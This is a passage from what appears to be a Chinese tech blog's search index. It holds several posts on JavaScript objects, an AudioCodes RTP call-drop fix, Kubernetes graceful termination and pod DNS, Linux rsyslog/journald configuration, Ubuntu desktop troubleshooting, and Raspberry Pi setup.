console.log(a,b,c) 上面三个对象的区别是什么?\n","permalink":"https://wdd.js.org/fe/js-object-create/","summary":"let a = {} let b = Object.create({}) let c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?","title":"{} Object.create({}) Object.create{null}的区别?"},{"content":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置了奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配制了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edityour SFB Profile -\u0026gt; Broken Connection Mode-\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。\n","permalink":"https://wdd.js.org/opensips/ch7/rtp-broken-connection/","summary":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置了奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配制了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edityour SFB Profile -\u0026gt; Broken Connection Mode-\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。","title":"奥科网关 Rtp Broken Connection"},{"content":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.\nIn this episode of “Kubernetes Best Practices,” let’s take a look at how you can help Kubernetes do its job more efficiently and reduce the downtime your applications experience.\nIn the pre-container world, most applications ran on VMs or physical machines. If an application crashed, it took quite a while to boot up a replacement. If you only had one or two machines to run the application, this kind of time-to-recovery was unacceptable.\nInstead, it became common to use process-level monitoring to restart applications when they crashed. If the application crashed, the monitoring process could capture the exit code and instantly restart the application.\nWith the advent of systems like Kubernetes, process monitoring systems are no longer necessary, as Kubernetes handles restarting crashed applications itself. Kubernetes uses an event loop to make sure that resources such as containers and nodes are healthy. This means you no longer need to manually run these monitoring processes. If a resource fails a health check, Kubernetes automatically spins up a replacement.\nThe Kubernetes termination lifecycle Kubernetes does a lot more than monitor your application for crashes. It can create more copies of your application to run on multiple machines, update your application, and even run multiple versions of your application at the same time! This means there are many reasons why Kubernetes might terminate a perfectly healthy container. If you update your deployment with a rolling update, Kubernetes slowly terminates old pods while spinning up new ones. If you drain a node, Kubernetes terminates all pods on that node. If a node runs out of resources, Kubernetes terminates pods to free those resources (check out this previous post to learn more about resources).\nIt’s important that your application handle termination gracefully so that there is minimal impact on the end user and the time-to-recovery is as fast as possible!\nIn practice, this means your application needs to handle the SIGTERM message and begin shutting down when it receives it. This means saving all data that needs to be saved, closing down network connections, finishing any work that is left, and other similar tasks.\nOnce Kubernetes has decided to terminate your pod, a series of events takes place. Let’s look at each step of the Kubernetes termination lifecycle.\n1 - Pod is set to the “Terminating” State and removed from the endpoints list of all Services At this point, the pod stops getting new traffic. Containers running in the pod will not be affected. 2 - preStop Hook is executed The preStop Hook is a special command or http request that is sent to the containers in the pod. If your application doesn’t gracefully shut down when receiving a SIGTERM you can use this hook to trigger a graceful shutdown. Most programs gracefully shut down when receiving a SIGTERM, but if you are using third-party code or are managing a system you don’t have control over, the preStop hook is a great way to trigger a graceful shutdown without modifying the application.\n3 - SIGTERM signal is sent to the pod At this point, Kubernetes will send a SIGTERM signal to the containers in the pod. This signal lets the containers know that they are going to be shut down soon. Your code should listen for this event and start shutting down cleanly at this point. This may include stopping any long-lived connections (like a database connection or WebSocket stream), saving the current state, or anything like that.\nEven if you are using the preStop hook, it is important that you test what happens to your application if you send it a SIGTERM signal, so you are not surprised in production!\n4 - Kubernetes waits for a grace period At this point, Kubernetes waits for a specified time called the termination grace period. By default, this is 30 seconds. It’s important to note that this happens in parallel to the preStop hook and the SIGTERM signal. Kubernetes does not wait for the preStop hook to finish. If your app finishes shutting down and exits before the terminationGracePeriod is done, Kubernetes moves to the next step immediately.\nIf your pod usually takes longer than 30 seconds to shut down, make sure you increase the grace period. You can do that by setting the terminationGracePeriodSeconds option in the Pod YAML. For example, to change it to 60 seconds:\n5 - SIGKILL signal is sent to pod, and the pod is removed If the containers are still running after the grace period, they are sent the SIGKILL signal and forcibly removed. At this point, all Kubernetes objects are cleaned up as well.\nConclusion Kubernetes can terminate pods for a variety of reasons, and making sure your application handles these terminations gracefully is core to creating a stable system and providing a great user experience.\nkubectl explain deployment.spec.template.spec KIND: Deployment VERSION: apps/v1 FIELD: terminationGracePeriodSeconds \u0026lt;integer\u0026gt; DESCRIPTION: Optional duration in seconds the pod needs to terminate gracefully. May be decreased in delete request. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period will be used instead. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. Defaults to 30 seconds. 1. 参考 https://stackoverflow.com/questions/35453792/pods-stuck-in-terminating-status ","permalink":"https://wdd.js.org/container/terminating-with-grace/","summary":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.","title":"优雅停止的pod"},{"content":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolve.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如何下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolve.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.kube-system.svc.cluster.local. 而实际上,这个IP地址就是kube-dns的地址。\n[root@kube-m ~]# kubectl get service -n kube-system -o wide NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR kube-dns ClusterIP 10.254.10.20 \u0026lt;none\u0026gt; 53/UDP,53/TCP 15d k8s-app=kube-dns 而k8s-app=kube-dns这个label可以选中coredns\n[root@kube-m ~]# kubectl get pod -l k8s-app=kube-dns -nkube-system NAME READY STATUS RESTARTS AGE coredns-79f9c855c5-nrk88 1/1 Running 0 15d coredns-79f9c855c5-x75rq 1/1 Running 0 5h45m ","permalink":"https://wdd.js.org/container/k8s-network/","summary":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolve.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如何下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolve.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.","title":"K8s pod node网络"},{"content":" 1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald的负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23). 日志等级:debug (7), info (6), notice (5), warning (4), err (3), crit (2), alert (1), and emerg (0). 正则 = 指定某个级别 ! 排除某个级别 匹配所有级别 Example: kern.* #选择所有的内核信息 mail.crit #选择所有优先级高于等于crit cron.!info # 选择cron日志不是info级别的日志 5.2.2. 属性过滤 模式::PROPERTY, [!]COMPARE_OPERATION, \u0026ldquo;STRING\u0026rdquo; **\n比较操作符(COMPARE_OPERATION) contains 包含 isequal 相等 starswitch 以xxx开头 regex 正则匹配 ** 举个比较常见的例子.\n如果日志中包含 wdd 这个字符串,就把日志写到/var/log/wdd.log 这个文件里。\n首先编辑一下/etc/rsyslog.conf 文件\n注意 :msg 表示消息的内容 详情可以参考 man rsyslog.conf 关于Available Properties的部分内容\n:msg,contains,\u0026#34;wdd\u0026#34; /var/log/wdd.log 保存退出,然后执行下面的命令:\ntouch /var/log/wdd.log # 创建文件 systemctl restart rsyslog # 重启服务 logger hello wdd ➜ log tail /var/log/wdd.log May 23 19:26:52 VM_0_8_centos root: hello wdd 5.2.3. Action 将rsyslog写日志文件:\n# 方式1:过滤器 日志路径 cron.* /var/log/cron.log # 方式2:过滤器\t-日志路径。注意多了个- # 默认rsyslog是同步写日志,加个-表示异步写日志。在写日志比较多时候,异步的写可以提高性能 mail.* -/var/log/cron.log # 方式3:通过网络发送日志 # @[(zNUMBER)]HOST:[PORT] zNUMBER是压缩等级 mail.* @192.168.2.3:8000 #通过UDP发送日志 cron.* @@192.168.2.3:8000 #通过TCP发送日志, 注意多了一个@ *.* @(2)192.168.2.3:8000 #通过UDP发送日志,日志会被压缩后发送,压缩等级是2。日志如果少于60字节,将不会压缩 5.2.4. 丢弃日志 cron.* stop *.* ~ # rsyslog8 支持用~丢弃日志 详情可以:man rsyslog.conf\n5.2.5. 日志回滚 man lograte 里面有很多日志\n/var/log/wdd.log { noolddir size 10M rotate 10 sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 6. 速度限制 6.1. journald的速度限制 RateLimitInterval 限速周期,默认30s RateLimitBurst 限速值, 默认限速值1000 针对单个service, 在一个限速周期内,如果消息量超过限速值,则丢弃本周期内的所有消息。\n/etc/systemd/journal.conf\n#RateLimitInterval=30s #RateLimitBurst=1000 如果想关闭速度限制,就将RateLimitInterval设置为0\nRateLimitInterval=, RateLimitBurst= Configures the rate limiting that is applied to all messages generated on the system. If, in the time interval defined by RateLimitInterval=, more messages than specified in RateLimitBurst= are logged by a service, all further messages within the interval are dropped until the interval is over. A message about the number of dropped messages is generated. This rate limiting is applied per-service, so that two services which log do not interfere with each other\u0026rsquo;s limits. Defaults to 1000 messages in 30s. The time specification for RateLimitInterval= may be specified in the following units: \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;ms\u0026rdquo;, \u0026ldquo;us\u0026rdquo;. To turn off any kind of rate\nlimiting, set either value to 0.\n6.2. rsyslog的速度限制 /etc/rsyslog.conf\n$SystemLogRateLimitInterval 2 # 单位是s $SystemLogRateLimitBurst 50 如果要关闭速度限制,就将SystemLogRateLimitInterval设置为0\n7. journal 日志清理 \u0026ndash;vacuum-size=, \u0026ndash;vacuum-time= Removes archived journal files until the disk space they use falls below the specified size (specified with the usual \u0026ldquo;K\u0026rdquo;, \u0026ldquo;M\u0026rdquo;, \u0026ldquo;G\u0026rdquo;, \u0026ldquo;T\u0026rdquo;\nsuffixes), or all journal files contain no data older than the specified timespan (specified with the usual \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;days\u0026rdquo;,\n\u0026ldquo;months\u0026rdquo;, \u0026ldquo;weeks\u0026rdquo;, \u0026ldquo;years\u0026rdquo; suffixes). Note that running \u0026ndash;vacuum-size= has only indirect effect on the output shown by \u0026ndash;disk-usage as\nthe latter includes active journal files, while the former only operates on archived journal files. \u0026ndash;vacuum-size= and \u0026ndash;vacuum-time=\nmay be combined in a single invocation to enforce both a size and time limit on the archived journal files.\n发现 /var/log/journal的目录居然有4G。\n所以需要清理。\n7.1. 手动清理 journalctl --vacuum-time=2d # 保留最近两天 journalctl --vacuum-size=500M # 保留最近500MB 按天执行一次试试:\njournalctl --vacuum-time=2d Vacuuming done, freed 3.9G of archived journals on disk. 7.2. 修改配置 为了避免以后还需要手动清理,可以修改/etc/systemd/journal.conf文件\n例如将最大使用改为200M\nSystemMaxUse=200M 重启journald: systemctl restart systemd-journald 8. linux 日志文件简介 inux的日志位于/var/log目录下。\n日志主要分为4类\n1 应用日志 2 事件日志 3 服务日志 4 系统日志 日志内容\n/var/log/messages 普通应用级别活动 /var/log/auth.log 用户验证相关事件 /var/log/secure 系统授权 /var/log/boot.log 系统启动日志 /var/log/dmesg.log 硬件设备相关 /var/log/kern.log 内核日志 /var/log/faillog 失败的登录尝试日志 /var/log/cron crontab计划任务日志 /var/log/yum.log 包安装日志 /var/log/maillog /var/log/mail.log 邮件服务相关日志 /var/log/httpd/ Apache web服务器日志 /var/log/mysql.log /var/log/mysqld.log mysql相关日志 ","permalink":"https://wdd.js.org/posts/2022/10/linux-journal/","summary":"1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald的负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23).","title":"Linux 日志系统简述"},{"content":"1. ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关系网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序取显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。\neog output.png 7. build-requirements: libtool not found. apt-get update apt-get install -y libtool-bin 8. ubuntu下解压zip文件出现中文乱码 相信大家在使用Ubuntu等linux系统时经常会遇到解压压缩文件出现乱码。 zip的处理方式主要有以下两种\n一、unzip 解压时-O指定字符编码\nunzip -O GBK xxxx.zip 注:解压很复杂的中文名文件称如果报错,用引号括起来即可\n二、unar\nunar xxx.zip 注:这种方式要先保证系统中有安装unar,若没有使用如下命令安装: sudo apt-get install unar\n9. 放弃ubuntu的GUI 选择linux的原因无非是丰富的开发软件包,各种个样的效率工具,而不是因为漂亮的GUI。\n我使用ubuntu大概已经有有几个月了,说说一些使用体会。\n聊天软件: 微信、QQ等工,目前只有wine版,使用体验会稍微比mac和window有些差,但是基本是可用。 输入法:搜狗输入法,基本上和win和mac没有什么差别 文档: wps 基本上和win和mac没有区别 浏览器: chrome, firefox体验始终丝滑 编辑器:neovim 畅享丝滑 各种开发工具:git, docker, oh my zsh tmux 等等, 这些天然就是linux下面的工具 总体来说,如果没有最近遇到的两个严重问题,我会一直用ubuntu下开发的。\nxorg经常cpu很高,导致界面卡死,出现频率很高,查了很多资料,依然无法解决。只能通过restart gdm3去重启。 有时候xorg cpu不算高,也查不出高cpu的进程,但是整个界面还是卡死 卡死的这个问题真的非常影响开发效率。\n所以我决定关闭ubuntu的图形界面,通过ssh链远程接,在上面做开发\n10. ubuntu 终端还是图形界面 ubuntu boot最后阶段,进入到登录提示。\n这里有两个选择\n图形界面 tty终端 具体是进入哪种显示方式,是由配置决定。但是默认的是图形界面。\n# 终端启动 systemctl set-default multi-user.target # 图形界面启动 systemctl set-default graphical.target 设置之后reboot 11. 如何从GUI进入到终端模式呢? 某些时候,ubuntu图形界面卡死,无法交互。如何进入终端模式使用top命令看看什么在占用CPU呢?\n有以下快捷键可以从GUI切换到tty\nCtrl + alt + f1 Ctrl + alt + f2 Ctrl + alt + f3 Ctrl + alt + f4 Ctrl + alt + f5 Ctrl + alt + f6 上面的快捷键都可以进入终端,如果一个不行,就用另一个试试。注意 ctrl alt f功能键 要同时按下去。\n我之前就遇到过,图形界面卡死,无法操作。然后进入终端模式,使用top命令,看到xorg占用了接近100%的CPU.\n然后输入下面的命令来重启gdm来解决的\nsudo systemctl restart gdm 12. 什么是GDM? GDM是gnome display manager的缩写。\n# 查看gonme版本号 gnome-shell --version 常见的gdm有\ngdm3 lightdm ssdm 通过查看/etc/X11/default-display-manager可以查看系统使用的gdm具体是哪个\n➜ ~ cat /etc/X11/default-display-manager /usr/sbin/gdm3 也可以通过下面的方式查看 systemctl status display-manager # 可以通过下面的方式安装不同的gdm sudo apt install lightdm sudo apt install sddm # 通过dpkg-reconfigure 可以来配置使用不同的GDM sudo dpkg-reconfigure gdm3 sudo dpkg-reconfigure lightdm sudo dpkg-reconfigure sddm 13. ubuntu截图软件flameshot apt install flameshot 14. 生命不息 折腾不止 使用ubuntu作为主力开发工具 最初,我花了6年时间在windows上学习、娱乐、编码\n后来我花了4年时间转切换到macbook pro上开发\n现在,我切换到ubuntu上开发。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华\n才学会什么是效率,什么是专一。\n蓦然回首\n这10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n内心深处彷佛有人在说,你为什么要改变呢? 之前的感觉不是很好吗?\n你为什么要这么折腾呢?\n有一种鸟儿注定不会被关在牢笼里,因为它的每一片羽毛都闪耀着自由的光辉。\u0026ndash;《肖申克的救赎》\n改变,的确是让人不舒服的事情。\n说实话,刚开始在ubuntu上开发,连装个中文输入法都让我绝望的想要放弃。\n还好是IT行业,你路过的坑,肯定有前任踩过。\n说来有点搞笑,我在ubuntu上使用vscode时,居然感觉不习惯了。\n我不习惯写着写着代码,还要把手从键盘上移开,去寻找千里之行的鼠标,然后滑动、点击、一直不停歇\n然后我就切换回neovim。\n有人说:vim是跟得上思维速度的编辑器。只有真正使用过的人,才能理解这句话。\n当你每次想向上飞的时候,总会有更大的阻力。\n15. 最后的最后 我用的deepin 如果我只用终端,连上linux做开发,那么我最好的选择是ubuntu或者manjaro 但是我还是避免不了要用微信,腾讯会议等App,我又想用linux, 那最好的选择是deepin 可能是人老了,不想再折腾了\n","permalink":"https://wdd.js.org/posts/2022/10/ubuntu-tips/","summary":"1. ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关系网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序取显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。","title":"Ubuntu 使用过程中遇到的问题以及解决方案"},{"content":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh // chong 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如果找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:e7:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/\n","permalink":"https://wdd.js.org/posts/2022/10/raspi-config/","summary":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh // chong 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 